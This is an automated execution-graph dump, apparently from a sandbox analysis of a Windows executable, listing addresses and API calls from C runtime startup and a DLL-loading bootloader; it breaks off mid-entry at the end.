                                                                                                                                                                                                                                      execution_graph 19549 7ff70af11720 19560 7ff70af17454 19549->19560 19562 7ff70af17461 19560->19562 19561 7ff70af0a9b8 __free_lconv_mon 11 API calls 19561->19562 19562->19561 19563 7ff70af1747d 19562->19563 19564 7ff70af0a9b8 __free_lconv_mon 11 API calls 19563->19564 19565 7ff70af11729 19563->19565 19564->19563 19566 7ff70af10348 EnterCriticalSection 19565->19566 20482 7ff70af05480 20483 7ff70af0548b 20482->20483 20491 7ff70af0f314 20483->20491 20504 7ff70af10348 EnterCriticalSection 20491->20504 18893 7ff70af0b040 18894 7ff70af0b045 18893->18894 18898 7ff70af0b05a 18893->18898 18899 7ff70af0b060 18894->18899 18900 7ff70af0b0aa 18899->18900 18901 7ff70af0b0a2 18899->18901 18903 7ff70af0a9b8 __free_lconv_mon 11 API calls 18900->18903 18902 7ff70af0a9b8 __free_lconv_mon 11 API calls 18901->18902 18902->18900 18904 7ff70af0b0b7 18903->18904 18905 7ff70af0a9b8 __free_lconv_mon 11 API calls 18904->18905 18906 7ff70af0b0c4 18905->18906 18907 7ff70af0a9b8 __free_lconv_mon 11 API calls 18906->18907 18908 7ff70af0b0d1 18907->18908 18909 7ff70af0a9b8 __free_lconv_mon 11 API calls 18908->18909 18910 7ff70af0b0de 18909->18910 18911 7ff70af0a9b8 __free_lconv_mon 11 API calls 18910->18911 18912 7ff70af0b0eb 18911->18912 18913 7ff70af0a9b8 __free_lconv_mon 11 API calls 18912->18913 18914 7ff70af0b0f8 18913->18914 18915 7ff70af0a9b8 __free_lconv_mon 11 API calls 18914->18915 18916 7ff70af0b105 18915->18916 18917 7ff70af0a9b8 __free_lconv_mon 11 API calls 18916->18917 18918 7ff70af0b115 18917->18918 18919 7ff70af0a9b8 __free_lconv_mon 11 API calls 18918->18919 18920 7ff70af0b125 18919->18920 18925 7ff70af0af04 18920->18925 18939 7ff70af10348 EnterCriticalSection 18925->18939 20515 7ff70af09dc0 20518 7ff70af09d3c 20515->20518 20525 7ff70af10348 EnterCriticalSection 20518->20525 18727 7ff70af099d1 18728 7ff70af0a448 45 API calls 18727->18728 18729 7ff70af099d6 18728->18729 18730 7ff70af09a47 18729->18730 18731 7ff70af099fd GetModuleHandleW 18729->18731 18739 7ff70af098d4 18730->18739 18731->18730 18732 7ff70af09a0a 18731->18732 18732->18730 18753 7ff70af09af8 GetModuleHandleExW 18732->18753 18759 7ff70af10348 EnterCriticalSection 18739->18759 18754 7ff70af09b2c GetProcAddress 18753->18754 18755 7ff70af09b55 18753->18755 18756 7ff70af09b3e 18754->18756 18757 7ff70af09b5a FreeLibrary 18755->18757 18758 7ff70af09b61 18755->18758 18756->18755 18757->18758 18758->18730 19009 7ff70af1ac53 19010 7ff70af1ac63 19009->19010 19013 7ff70af054e8 LeaveCriticalSection 19010->19013 20557 7ff70af1add9 20560 7ff70af054e8 LeaveCriticalSection 20557->20560 15918 7ff70aefbb50 15919 7ff70aefbb7e 15918->15919 15920 7ff70aefbb65 15918->15920 15920->15919 15923 7ff70af0d66c 15920->15923 15924 7ff70af0d6b7 15923->15924 15928 7ff70af0d67b _get_daylight 15923->15928 15933 7ff70af04f78 15924->15933 15925 7ff70af0d69e HeapAlloc 15927 7ff70aefbbde 15925->15927 15925->15928 15928->15924 15928->15925 15930 7ff70af13600 15928->15930 15936 7ff70af13640 15930->15936 15942 7ff70af0b338 GetLastError 15933->15942 15935 7ff70af04f81 15935->15927 15941 7ff70af10348 EnterCriticalSection 15936->15941 15943 7ff70af0b379 FlsSetValue 15942->15943 15948 7ff70af0b35c 15942->15948 15944 7ff70af0b38b 15943->15944 15947 7ff70af0b369 SetLastError 15943->15947 15959 7ff70af0ec08 15944->15959 15947->15935 15948->15943 15948->15947 15950 7ff70af0b3b8 FlsSetValue 15953 7ff70af0b3c4 FlsSetValue 15950->15953 15954 7ff70af0b3d6 15950->15954 15951 7ff70af0b3a8 FlsSetValue 15952 7ff70af0b3b1 15951->15952 15966 7ff70af0a9b8 15952->15966 15953->15952 15972 7ff70af0af64 15954->15972 15960 7ff70af0ec19 _get_daylight 15959->15960 15961 7ff70af0ec6a 15960->15961 15962 7ff70af0ec4e HeapAlloc 15960->15962 15965 7ff70af13600 _get_daylight 2 API calls 15960->15965 15964 7ff70af04f78 _get_daylight 10 API calls 15961->15964 15962->15960 15963 7ff70af0b39a 15962->15963 15963->15950 15963->15951 15964->15963 15965->15960 15967 7ff70af0a9bd RtlFreeHeap 15966->15967 15971 7ff70af0a9ec 15966->15971 15968 7ff70af0a9d8 GetLastError 15967->15968 15967->15971 15969 7ff70af0a9e5 __free_lconv_mon 15968->15969 15970 7ff70af04f78 _get_daylight 9 API calls 15969->15970 15970->15971 15971->15947 15977 7ff70af0ae3c 15972->15977 15989 7ff70af10348 EnterCriticalSection 15977->15989 19017 7ff70aefcbc0 19018 7ff70aefcbd0 19017->19018 19034 7ff70af09c18 19018->19034 19020 7ff70aefcbdc 19040 7ff70aefceb8 19020->19040 19022 7ff70aefd19c 7 API calls 19024 7ff70aefcc75 19022->19024 19023 7ff70aefcbf4 _RTC_Initialize 19032 7ff70aefcc49 19023->19032 19045 7ff70aefd068 19023->19045 19026 7ff70aefcc09 19048 7ff70af09084 19026->19048 19032->19022 19033 7ff70aefcc65 19032->19033 19035 7ff70af09c29 19034->19035 19036 7ff70af09c31 19035->19036 19037 7ff70af04f78 _get_daylight 11 API calls 19035->19037 19036->19020 19038 7ff70af09c40 19037->19038 19039 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 19038->19039 19039->19036 19041 7ff70aefcec9 19040->19041 19042 7ff70aefcece __scrt_acquire_startup_lock 19040->19042 19041->19042 19043 7ff70aefd19c 7 API calls 19041->19043 19042->19023 19044 7ff70aefcf42 19043->19044 19073 7ff70aefd02c 19045->19073 19047 7ff70aefd071 19047->19026 19049 7ff70af090a4 19048->19049 19056 7ff70aefcc15 19048->19056 19050 7ff70af090ac 19049->19050 19051 7ff70af090c2 GetModuleFileNameW 19049->19051 19052 7ff70af04f78 _get_daylight 11 API calls 19050->19052 19053 7ff70af090ed 19051->19053 19054 7ff70af090b1 19052->19054 19088 7ff70af09024 19053->19088 19055 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 19054->19055 19055->19056 19056->19032 19072 7ff70aefd13c InitializeSListHead 19056->19072 19059 7ff70af09135 19060 7ff70af04f78 _get_daylight 11 API calls 19059->19060 19061 7ff70af0913a 19060->19061 19064 7ff70af0a9b8 __free_lconv_mon 11 API calls 19061->19064 19062 7ff70af0916f 19065 7ff70af0a9b8 __free_lconv_mon 11 API calls 19062->19065 19063 7ff70af0914d 19063->19062 19066 7ff70af0919b 19063->19066 19067 7ff70af091b4 19063->19067 19064->19056 19065->19056 19068 7ff70af0a9b8 __free_lconv_mon 11 API calls 19066->19068 19069 7ff70af0a9b8 __free_lconv_mon 11 API calls 19067->19069 19070 7ff70af091a4 19068->19070 19069->19062 19071 7ff70af0a9b8 __free_lconv_mon 11 API calls 19070->19071 19071->19056 19074 7ff70aefd046 19073->19074 19076 7ff70aefd03f 19073->19076 19077 7ff70af0a25c 19074->19077 19076->19047 19080 7ff70af09e98 19077->19080 19087 7ff70af10348 EnterCriticalSection 19080->19087 19089 7ff70af09074 19088->19089 19090 7ff70af0903c 19088->19090 19089->19059 19089->19063 19090->19089 19091 7ff70af0ec08 _get_daylight 11 API calls 19090->19091 19092 7ff70af0906a 19091->19092 19093 7ff70af0a9b8 __free_lconv_mon 11 API calls 19092->19093 19093->19089 19094 7ff70af1ae6e 19095 7ff70af1ae7d 19094->19095 19097 7ff70af1ae87 19094->19097 19098 7ff70af103a8 LeaveCriticalSection 19095->19098 20580 7ff70af0f9fc 20581 7ff70af0fbee 20580->20581 20583 7ff70af0fa3e _isindst 20580->20583 20582 7ff70af04f78 _get_daylight 11 API calls 20581->20582 20600 7ff70af0fbde 20582->20600 20583->20581 20586 7ff70af0fabe _isindst 20583->20586 20584 7ff70aefc5c0 _log10_special 8 API calls 20585 7ff70af0fc09 20584->20585 20601 7ff70af16204 20586->20601 20591 7ff70af0fc1a 20593 7ff70af0a970 _isindst 17 API calls 20591->20593 20595 7ff70af0fc2e 20593->20595 20598 7ff70af0fb1b 20598->20600 20626 7ff70af16248 20598->20626 20600->20584 20602 7ff70af0fadc 20601->20602 20603 7ff70af16213 20601->20603 20608 7ff70af15608 20602->20608 20633 7ff70af10348 EnterCriticalSection 20603->20633 20609 7ff70af0faf1 20608->20609 20610 7ff70af15611 20608->20610 20609->20591 20614 7ff70af15638 20609->20614 20611 7ff70af04f78 _get_daylight 11 API calls 20610->20611 20612 7ff70af15616 20611->20612 20613 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 20612->20613 20613->20609 20615 7ff70af0fb02 20614->20615 20616 7ff70af15641 20614->20616 20615->20591 20620 7ff70af15668 20615->20620 20617 7ff70af04f78 _get_daylight 11 API calls 20616->20617 20618 7ff70af15646 20617->20618 20619 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 20618->20619 20619->20615 20621 7ff70af15671 20620->20621 20622 7ff70af0fb13 20620->20622 20623 7ff70af04f78 _get_daylight 11 API calls 20621->20623 20622->20591 20622->20598 20624 7ff70af15676 20623->20624 20625 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 20624->20625 20625->20622 20634 7ff70af10348 EnterCriticalSection 20626->20634 15991 7ff70aefccac 16012 7ff70aefce7c 15991->16012 15994 7ff70aefcdf8 16166 7ff70aefd19c IsProcessorFeaturePresent 15994->16166 15995 7ff70aefccc8 __scrt_acquire_startup_lock 15997 7ff70aefce02 15995->15997 15999 7ff70aefcce6 __scrt_release_startup_lock 15995->15999 15998 7ff70aefd19c 7 API calls 15997->15998 16001 7ff70aefce0d __CxxCallCatchBlock 15998->16001 16000 7ff70aefcd0b 15999->16000 16002 7ff70aefcd91 15999->16002 16155 7ff70af09b9c 15999->16155 16018 7ff70aefd2e4 16002->16018 16004 7ff70aefcd96 16021 7ff70aef1000 16004->16021 16009 7ff70aefcdb9 16009->16001 16162 7ff70aefd000 16009->16162 16013 7ff70aefce84 16012->16013 16014 7ff70aefce90 __scrt_dllmain_crt_thread_attach 16013->16014 16015 7ff70aefce9d 16014->16015 16017 7ff70aefccc0 16014->16017 16015->16017 16173 7ff70aefd8f8 16015->16173 16017->15994 16017->15995 16200 7ff70af1a540 16018->16200 16020 7ff70aefd2fb GetStartupInfoW 16020->16004 16022 7ff70aef1009 16021->16022 16202 7ff70af054f4 16022->16202 16024 7ff70aef37fb 16209 7ff70aef36b0 16024->16209 16031 7ff70aef391b 16378 7ff70aef45b0 16031->16378 16032 7ff70aef383c 16369 7ff70aef1c80 16032->16369 16036 7ff70aef385b 16281 7ff70aef8a20 16036->16281 16037 7ff70aef396a 16401 7ff70aef2710 16037->16401 16041 7ff70aef388e 16048 7ff70aef38bb __std_exception_destroy 16041->16048 16373 7ff70aef8b90 16041->16373 16042 7ff70aef395d 16043 7ff70aef3984 16042->16043 16044 7ff70aef3962 16042->16044 16046 7ff70aef1c80 49 API calls 16043->16046 16397 7ff70af000bc 16044->16397 16049 7ff70aef39a3 16046->16049 16050 7ff70aef8a20 14 API calls 16048->16050 16058 7ff70aef38de __std_exception_destroy 16048->16058 16054 7ff70aef1950 115 API calls 16049->16054 16050->16058 16052 7ff70aef3a0b 16053 7ff70aef8b90 40 API calls 16052->16053 16055 7ff70aef3a17 16053->16055 16056 7ff70aef39ce 16054->16056 16059 7ff70aef8b90 40 API calls 16055->16059 16056->16036 16057 7ff70aef39de 16056->16057 16060 7ff70aef2710 54 API calls 16057->16060 16063 7ff70aef390e __std_exception_destroy 16058->16063 16412 7ff70aef8b30 16058->16412 16061 7ff70aef3a23 16059->16061 16103 7ff70aef3808 __std_exception_destroy 16060->16103 16062 7ff70aef8b90 40 API calls 16061->16062 16062->16063 16064 7ff70aef8a20 14 API calls 16063->16064 16065 7ff70aef3a3b 16064->16065 16066 7ff70aef3b2f 16065->16066 16067 7ff70aef3a60 __std_exception_destroy 16065->16067 16068 7ff70aef2710 54 API calls 16066->16068 16069 7ff70aef8b30 40 API calls 16067->16069 16077 7ff70aef3aab 16067->16077 16068->16103 16069->16077 16070 7ff70aef8a20 14 API calls 16071 7ff70aef3bf4 __std_exception_destroy 16070->16071 16072 7ff70aef3c46 16071->16072 16073 7ff70aef3d41 16071->16073 16074 7ff70aef3cd4 16072->16074 16075 7ff70aef3c50 16072->16075 16428 7ff70aef44d0 16073->16428 16079 7ff70aef8a20 14 API calls 16074->16079 16294 7ff70aef90e0 16075->16294 16077->16070 16082 7ff70aef3ce0 16079->16082 16080 7ff70aef3d4f 16083 7ff70aef3d65 16080->16083 16084 7ff70aef3d71 16080->16084 16085 7ff70aef3c61 16082->16085 16089 7ff70aef3ced 16082->16089 16431 7ff70aef4620 16083->16431 16087 7ff70aef1c80 49 API calls 16084->16087 16091 7ff70aef2710 54 API calls 16085->16091 16099 7ff70aef3cc8 __std_exception_destroy 16087->16099 16092 7ff70aef1c80 49 API calls 16089->16092 16091->16103 16095 7ff70aef3d0b 16092->16095 16093 7ff70aef3dc4 16344 7ff70aef9400 16093->16344 16098 7ff70aef3d12 16095->16098 16095->16099 16096 7ff70aef3da7 SetDllDirectoryW LoadLibraryExW 16096->16093 16097 7ff70aef3dd7 SetDllDirectoryW 16102 7ff70aef3e0a 16097->16102 16146 7ff70aef3e5a 16097->16146 16101 7ff70aef2710 54 API calls 16098->16101 16099->16093 16099->16096 16101->16103 16105 7ff70aef8a20 14 API calls 16102->16105 16419 7ff70aefc5c0 16103->16419 16104 7ff70aef3ffc 16107 7ff70aef4006 PostMessageW GetMessageW 16104->16107 16108 7ff70aef4029 16104->16108 16111 7ff70aef3e16 __std_exception_destroy 16105->16111 16106 7ff70aef3f1b 16349 7ff70aef33c0 16106->16349 16107->16108 16508 7ff70aef3360 16108->16508 16113 7ff70aef3ef2 16111->16113 16117 7ff70aef3e4e 16111->16117 16116 7ff70aef8b30 40 API calls 16113->16116 16116->16146 16117->16146 16434 7ff70aef6db0 16117->16434 16124 7ff70aef6fb0 FreeLibrary 16127 7ff70aef404f 16124->16127 16133 7ff70aef3e81 16135 7ff70aef3ea2 16133->16135 16147 7ff70aef3e85 16133->16147 16455 7ff70aef6df0 16133->16455 16135->16147 16474 7ff70aef71a0 16135->16474 16146->16104 16146->16106 16147->16146 16490 7ff70aef2a50 16147->16490 16156 7ff70af09bb3 16155->16156 16157 7ff70af09bd4 16155->16157 16156->16002 18678 7ff70af0a448 16157->18678 16160 7ff70aefd328 GetModuleHandleW 16161 7ff70aefd339 16160->16161 16161->16009 16163 7ff70aefd011 16162->16163 16164 7ff70aefcdd0 16163->16164 16165 7ff70aefd8f8 7 API calls 16163->16165 16164->16000 16165->16164 16167 7ff70aefd1c2 _isindst memcpy_s 16166->16167 16168 7ff70aefd1e1 RtlCaptureContext RtlLookupFunctionEntry 16167->16168 16169 7ff70aefd246 memcpy_s 16168->16169 16170 7ff70aefd20a RtlVirtualUnwind 16168->16170 16171 7ff70aefd278 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16169->16171 16170->16169 16172 7ff70aefd2c6 _isindst 16171->16172 16172->15997 16174 7ff70aefd900 16173->16174 16175 7ff70aefd90a 16173->16175 16179 7ff70aefdc94 16174->16179 16175->16017 16180 7ff70aefdca3 16179->16180 16181 7ff70aefd905 16179->16181 16187 7ff70aefded0 16180->16187 16183 7ff70aefdd00 16181->16183 16184 7ff70aefdd2b 16183->16184 16185 7ff70aefdd2f 16184->16185 16186 7ff70aefdd0e DeleteCriticalSection 16184->16186 16185->16175 16186->16184 16191 7ff70aefdd38 16187->16191 16192 7ff70aefdd7c __vcrt_FlsAlloc 16191->16192 16193 7ff70aefde22 TlsFree 16191->16193 16192->16193 16194 7ff70aefddaa LoadLibraryExW 16192->16194 16195 7ff70aefde69 GetProcAddress 16192->16195 16199 7ff70aefdded LoadLibraryExW 16192->16199 16196 7ff70aefddcb GetLastError 16194->16196 16197 7ff70aefde49 16194->16197 16195->16193 16196->16192 16197->16195 16198 7ff70aefde60 FreeLibrary 16197->16198 16198->16195 16199->16192 16199->16197 16201 7ff70af1a530 16200->16201 16201->16020 16201->16201 16205 7ff70af0f4f0 16202->16205 16203 7ff70af0f543 16521 7ff70af0a884 16203->16521 16205->16203 16206 7ff70af0f596 16205->16206 16531 7ff70af0f3c8 16206->16531 16208 7ff70af0f56c 16208->16024 16577 7ff70aefc8c0 16209->16577 16212 7ff70aef3710 16579 7ff70aef92f0 FindFirstFileExW 16212->16579 16213 7ff70aef36eb GetLastError 16584 7ff70aef2c50 16213->16584 16217 7ff70aef3723 16599 7ff70aef9370 CreateFileW 16217->16599 16218 7ff70aef377d 16610 7ff70aef94b0 16218->16610 16220 7ff70aefc5c0 _log10_special 8 API calls 16223 7ff70aef37b5 16220->16223 16222 7ff70aef378b 16228 7ff70aef2810 49 API calls 16222->16228 16230 7ff70aef3706 16222->16230 16223->16103 16231 7ff70aef1950 16223->16231 16225 7ff70aef3734 16602 7ff70aef2810 16225->16602 16226 7ff70aef374c __vcrt_FlsAlloc 16226->16218 16228->16230 16230->16220 16232 7ff70aef45b0 108 API calls 16231->16232 16233 7ff70aef1985 16232->16233 16234 7ff70aef1c43 16233->16234 16236 7ff70aef7f80 83 API calls 16233->16236 16235 7ff70aefc5c0 _log10_special 8 API calls 16234->16235 16238 7ff70aef1c5e 16235->16238 16237 7ff70aef19cb 16236->16237 16280 7ff70aef1a03 16237->16280 17008 7ff70af00744 16237->17008 16238->16031 16238->16032 16240 7ff70af000bc 74 API calls 16240->16234 16241 7ff70aef19e5 16242 7ff70aef19e9 16241->16242 16243 7ff70aef1a08 16241->16243 16244 7ff70af04f78 _get_daylight 11 API calls 16242->16244 17012 7ff70af0040c 16243->17012 16246 7ff70aef19ee 16244->16246 17015 7ff70aef2910 16246->17015 16249 7ff70aef1a45 16253 7ff70aef1a7b 16249->16253 16254 7ff70aef1a5c 16249->16254 16250 7ff70aef1a26 16251 7ff70af04f78 _get_daylight 11 API calls 16250->16251 16252 7ff70aef1a2b 16251->16252 16255 7ff70aef2910 54 API calls 16252->16255 16257 7ff70aef1c80 49 API calls 16253->16257 16256 7ff70af04f78 _get_daylight 11 API calls 16254->16256 16255->16280 16258 7ff70aef1a61 16256->16258 16259 7ff70aef1a92 16257->16259 16260 7ff70aef2910 54 API calls 16258->16260 16261 7ff70aef1c80 49 API calls 16259->16261 16260->16280 16262 7ff70aef1add 16261->16262 16263 7ff70af00744 73 API calls 16262->16263 16264 7ff70aef1b01 16263->16264 16265 7ff70aef1b35 16264->16265 16266 7ff70aef1b16 16264->16266 16268 7ff70af0040c _fread_nolock 53 API calls 16265->16268 16267 7ff70af04f78 _get_daylight 11 API calls 16266->16267 16269 7ff70aef1b1b 16267->16269 16270 7ff70aef1b4a 16268->16270 16271 7ff70aef2910 54 API calls 16269->16271 16272 7ff70aef1b6f 16270->16272 16273 7ff70aef1b50 16270->16273 16271->16280 17030 7ff70af00180 16272->17030 16275 7ff70af04f78 _get_daylight 11 API calls 16273->16275 16277 7ff70aef1b55 16275->16277 16278 7ff70aef2910 54 API calls 16277->16278 16278->16280 16279 7ff70aef2710 54 API calls 16279->16280 16280->16240 16282 7ff70aef8a2a 16281->16282 16283 7ff70aef9400 2 API calls 16282->16283 16284 7ff70aef8a49 GetEnvironmentVariableW 16283->16284 16285 7ff70aef8a66 ExpandEnvironmentStringsW 16284->16285 16286 7ff70aef8ab2 16284->16286 16285->16286 16287 7ff70aef8a88 16285->16287 16288 7ff70aefc5c0 _log10_special 8 API calls 16286->16288 16289 7ff70aef94b0 2 API calls 16287->16289 16290 7ff70aef8ac4 16288->16290 16291 7ff70aef8a9a 16289->16291 16290->16041 16292 7ff70aefc5c0 _log10_special 8 API calls 16291->16292 16293 7ff70aef8aaa 16292->16293 16293->16041 16295 7ff70aef90f5 16294->16295 17248 7ff70aef8760 GetCurrentProcess OpenProcessToken 16295->17248 16298 7ff70aef8760 7 API calls 16299 7ff70aef9121 16298->16299 16300 7ff70aef9154 16299->16300 16301 7ff70aef913a 16299->16301 16303 7ff70aef26b0 48 API calls 16300->16303 16302 7ff70aef26b0 48 API calls 16301->16302 16304 7ff70aef9152 16302->16304 16305 7ff70aef9167 LocalFree LocalFree 16303->16305 16304->16305 16306 7ff70aef9183 16305->16306 16309 7ff70aef918f 16305->16309 17258 7ff70aef2b50 16306->17258 16308 7ff70aefc5c0 _log10_special 8 API calls 16310 7ff70aef3c55 16308->16310 16309->16308 16310->16085 16311 7ff70aef8850 16310->16311 16312 7ff70aef8868 16311->16312 16313 7ff70aef888c 16312->16313 16314 7ff70aef88ea GetTempPathW GetCurrentProcessId 16312->16314 16316 7ff70aef8a20 14 API calls 16313->16316 17267 7ff70aef25c0 16314->17267 16318 7ff70aef8898 16316->16318 16317 7ff70aef8918 __std_exception_destroy 16329 7ff70aef8955 __std_exception_destroy 16317->16329 17271 7ff70af08bd8 16317->17271 17274 7ff70aef81c0 16318->17274 16325 7ff70aef88be __std_exception_destroy 16325->16314 16332 7ff70aef88cc 16325->16332 16327 7ff70aef88d8 __std_exception_destroy 16343 7ff70aef89c4 __std_exception_destroy 16327->16343 16335 7ff70aef9400 2 API calls 16329->16335 16329->16343 16330 7ff70aefc5c0 _log10_special 8 API calls 16331 7ff70aef3cbb 16330->16331 16331->16085 16331->16099 16334 7ff70aef2810 49 API calls 16332->16334 16334->16327 16336 7ff70aef89a1 16335->16336 16337 7ff70aef89a6 16336->16337 16338 7ff70aef89d9 16336->16338 16339 7ff70aef9400 2 API calls 16337->16339 16340 7ff70af082a8 38 API calls 16338->16340 16341 7ff70aef89b6 16339->16341 16340->16343 16342 7ff70af082a8 38 API calls 16341->16342 16342->16343 16343->16330 16345 7ff70aef9422 MultiByteToWideChar 16344->16345 16346 7ff70aef9446 16344->16346 16345->16346 16348 7ff70aef945c __std_exception_destroy 16345->16348 16347 7ff70aef9463 MultiByteToWideChar 16346->16347 16346->16348 16347->16348 16348->16097 16365 7ff70aef33ce memcpy_s 16349->16365 16350 7ff70aefc5c0 _log10_special 8 API calls 16352 7ff70aef3664 16350->16352 16351 7ff70aef35c7 16351->16350 16352->16103 16368 7ff70aef90c0 LocalFree 16352->16368 16354 7ff70aef1c80 49 API calls 16354->16365 16355 7ff70aef35e2 16357 7ff70aef2710 54 API calls 16355->16357 16357->16351 16360 7ff70aef35c9 16362 7ff70aef2710 54 API calls 16360->16362 16361 7ff70aef2a50 54 API calls 16361->16365 16362->16351 16365->16351 16365->16354 16365->16355 16365->16360 16365->16361 16366 7ff70aef35d0 16365->16366 17563 7ff70aef4550 16365->17563 17569 7ff70aef7e10 16365->17569 17581 7ff70aef1600 16365->17581 17629 7ff70aef7110 16365->17629 17633 7ff70aef4180 16365->17633 17677 7ff70aef4440 16365->17677 16367 7ff70aef2710 54 API calls 16366->16367 16367->16351 16370 7ff70aef1ca5 16369->16370 16371 7ff70af049f4 49 API calls 16370->16371 16372 7ff70aef1cc8 16371->16372 16372->16036 16374 7ff70aef9400 2 API calls 16373->16374 16375 7ff70aef8ba4 16374->16375 16376 7ff70af082a8 38 API calls 16375->16376 16377 7ff70aef8bb6 __std_exception_destroy 16376->16377 16377->16048 16379 7ff70aef45bc 16378->16379 16380 7ff70aef9400 2 API calls 16379->16380 16381 7ff70aef45e4 16380->16381 16382 7ff70aef9400 2 API calls 16381->16382 16383 7ff70aef45f7 16382->16383 17860 7ff70af06004 16383->17860 16386 7ff70aefc5c0 _log10_special 8 API calls 16387 7ff70aef392b 16386->16387 16387->16037 16388 7ff70aef7f80 16387->16388 16389 7ff70aef7fa4 16388->16389 16390 7ff70af00744 73 API calls 16389->16390 16395 7ff70aef807b __std_exception_destroy 16389->16395 16391 7ff70aef7fc0 16390->16391 16391->16395 18252 7ff70af07938 16391->18252 16393 7ff70af00744 73 API calls 16396 7ff70aef7fd5 16393->16396 16394 7ff70af0040c _fread_nolock 53 API calls 16394->16396 16395->16042 16396->16393 16396->16394 16396->16395 16398 7ff70af000ec 16397->16398 18267 7ff70aeffe98 16398->18267 16400 7ff70af00105 16400->16037 16402 7ff70aefc8c0 16401->16402 16403 7ff70aef2734 GetCurrentProcessId 16402->16403 16404 7ff70aef1c80 49 API calls 16403->16404 16405 7ff70aef2787 16404->16405 16406 7ff70af049f4 49 API calls 16405->16406 16407 7ff70aef27cf 16406->16407 16408 7ff70aef2620 12 API calls 16407->16408 16409 7ff70aef27f1 16408->16409 16410 7ff70aefc5c0 _log10_special 8 API calls 16409->16410 16411 7ff70aef2801 16410->16411 16411->16103 16413 7ff70aef9400 2 API calls 16412->16413 16414 7ff70aef8b4c 16413->16414 16415 7ff70aef9400 2 API calls 16414->16415 16416 7ff70aef8b5c 16415->16416 16417 7ff70af082a8 38 API calls 16416->16417 16418 7ff70aef8b6a __std_exception_destroy 16417->16418 16418->16052 16420 7ff70aefc5c9 16419->16420 16421 7ff70aef3ca7 16420->16421 16422 7ff70aefc950 IsProcessorFeaturePresent 16420->16422 16421->16160 16423 7ff70aefc968 16422->16423 18278 7ff70aefcb48 RtlCaptureContext 16423->18278 16429 7ff70aef1c80 49 API calls 16428->16429 16430 7ff70aef44ed 16429->16430 16430->16080 16432 7ff70aef1c80 49 API calls 16431->16432 16433 7ff70aef4650 16432->16433 16433->16099 16435 7ff70aef6dc5 16434->16435 16436 7ff70aef3e6c 16435->16436 16437 7ff70af04f78 _get_daylight 11 API calls 16435->16437 16440 7ff70aef7330 16436->16440 16438 7ff70aef6dd2 16437->16438 16439 7ff70aef2910 54 API calls 16438->16439 16439->16436 18283 7ff70aef1470 16440->18283 16442 7ff70aef7358 16443 7ff70aef4620 49 API calls 16442->16443 16453 7ff70aef74a9 __std_exception_destroy 16442->16453 16444 7ff70aef737a 16443->16444 16445 7ff70aef737f 16444->16445 16446 7ff70aef4620 49 API calls 16444->16446 16448 7ff70aef2a50 54 API calls 16445->16448 16447 7ff70aef739e 16446->16447 16447->16445 16449 7ff70aef4620 49 API calls 16447->16449 16448->16453 16450 7ff70aef73ba 16449->16450 16450->16445 16451 7ff70aef73c3 16450->16451 16452 7ff70aef2710 54 API calls 16451->16452 16454 7ff70aef7433 __std_exception_destroy memcpy_s 16451->16454 16452->16453 16453->16133 16454->16133 16462 7ff70aef6e0c 16455->16462 16456 7ff70aefc5c0 _log10_special 8 API calls 16458 7ff70aef6f41 16456->16458 16457 7ff70aef1840 45 API calls 16457->16462 16458->16135 16459 7ff70aef6f9a 16461 7ff70aef2710 54 API calls 16459->16461 16460 7ff70aef1c80 49 API calls 16460->16462 16471 7ff70aef6f2f 16461->16471 16462->16457 16462->16459 16462->16460 16463 7ff70aef6f87 16462->16463 16465 7ff70aef4550 10 API calls 16462->16465 16466 7ff70aef7e10 52 API calls 16462->16466 16467 7ff70aef2a50 54 API calls 16462->16467 16468 7ff70aef6f74 16462->16468 16470 7ff70aef1600 118 API calls 16462->16470 16462->16471 16472 7ff70aef6f5d 16462->16472 16464 7ff70aef2710 54 API calls 16463->16464 16464->16471 16465->16462 16466->16462 16467->16462 16469 7ff70aef2710 54 API calls 16468->16469 16469->16471 16470->16462 16471->16456 16473 7ff70aef2710 54 API calls 16472->16473 16473->16471 18313 7ff70aef9070 16474->18313 16476 7ff70aef71b9 16477 7ff70aef9070 3 API calls 16476->16477 16478 7ff70aef71cc 16477->16478 16479 7ff70aef71ff 16478->16479 16480 7ff70aef71e4 16478->16480 18317 7ff70aef76b0 GetProcAddress 16480->18317 16491 7ff70aefc8c0 16490->16491 16492 7ff70aef2a74 GetCurrentProcessId 16491->16492 16493 7ff70aef1c80 49 API calls 16492->16493 16494 7ff70aef2ac7 16493->16494 16495 7ff70af049f4 49 API calls 16494->16495 16496 7ff70aef2b0f 16495->16496 16497 7ff70aef2620 12 API calls 16496->16497 16498 7ff70aef2b31 16497->16498 18389 7ff70aef6350 16508->18389 16512 7ff70aef3381 16516 7ff70aef3399 16512->16516 18457 7ff70aef6040 16512->18457 16514 7ff70aef338d 16514->16516 18466 7ff70aef61d0 16514->18466 16517 7ff70aef3670 16516->16517 16518 7ff70aef367e 16517->16518 16519 7ff70aef368f 16518->16519 18677 7ff70aef9050 FreeLibrary 16518->18677 16519->16124 16538 7ff70af0a5cc 16521->16538 16525 7ff70af0a8bf 16525->16208 16576 7ff70af054dc EnterCriticalSection 16531->16576 16539 7ff70af0a5e8 GetLastError 16538->16539 16540 7ff70af0a623 16538->16540 16541 7ff70af0a5f8 16539->16541 16540->16525 16544 7ff70af0a638 16540->16544 16551 7ff70af0b400 16541->16551 16545 7ff70af0a654 GetLastError SetLastError 16544->16545 16546 7ff70af0a66c 16544->16546 16545->16546 16546->16525 16547 7ff70af0a970 IsProcessorFeaturePresent 16546->16547 16548 7ff70af0a983 16547->16548 16568 7ff70af0a684 16548->16568 16552 7ff70af0b43a FlsSetValue 16551->16552 16553 7ff70af0b41f FlsGetValue 16551->16553 16555 7ff70af0b447 16552->16555 16556 7ff70af0a613 SetLastError 16552->16556 16554 7ff70af0b434 16553->16554 16553->16556 16554->16552 16557 7ff70af0ec08 _get_daylight 11 API calls 16555->16557 16556->16540 16558 7ff70af0b456 16557->16558 16559 7ff70af0b474 FlsSetValue 16558->16559 16560 7ff70af0b464 FlsSetValue 16558->16560 16562 7ff70af0b480 FlsSetValue 16559->16562 16563 7ff70af0b492 16559->16563 16561 7ff70af0b46d 16560->16561 16564 7ff70af0a9b8 __free_lconv_mon 11 API calls 16561->16564 16562->16561 16565 7ff70af0af64 _get_daylight 11 API calls 16563->16565 16564->16556 16566 7ff70af0b49a 16565->16566 16567 7ff70af0a9b8 __free_lconv_mon 11 API 